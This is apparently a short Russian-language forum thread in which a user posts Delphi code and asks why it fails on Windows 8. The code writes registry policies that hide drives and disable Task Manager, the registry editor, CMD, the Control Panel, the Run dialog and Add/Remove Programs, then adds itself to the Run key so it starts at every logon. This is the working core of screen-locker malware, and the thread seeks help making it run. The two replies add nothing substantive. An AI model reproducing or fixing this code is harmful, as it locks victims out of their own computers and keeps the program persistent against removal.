Галина Кролевецкая

Failed to set data for windows 8

r:=TRegistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall', True);
r.WriteInteger('NoAddRemovePrograms', 1);
r.CloseKey;
r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer', True);
r.WriteInteger('NoViewOnDrive', 12);
r.WriteInteger('NoDrives', 12);
r.WriteInteger('NoControlPanel', 1);
r.WriteInteger('NoFileMenu', 1);
r.WriteInteger('NoRun', 1);
r.CloseKey;
r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\System', True);
r.WriteInteger('DisableTaskMgr', 1);
r.WriteInteger('DisableRegistryTools', 1);
r.CloseKey;
r.OpenKey('Software\Policies\Microsoft\Windows\System', True);
r.WriteInteger('DisableCMD', 1);
r.CloseKey;
r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', True);
r.WriteString('Win32', Application.ExeName);
r.CloseKey;
r.Free;

На Windows 8 (Delphi 2009) пишет Failed to set data for 'имя параметра'

Ya Anechka

на билла с его 8-кой уже и КНДР ополчилось

Зу
Зульфия

Была такая же проблема, юзай mwfix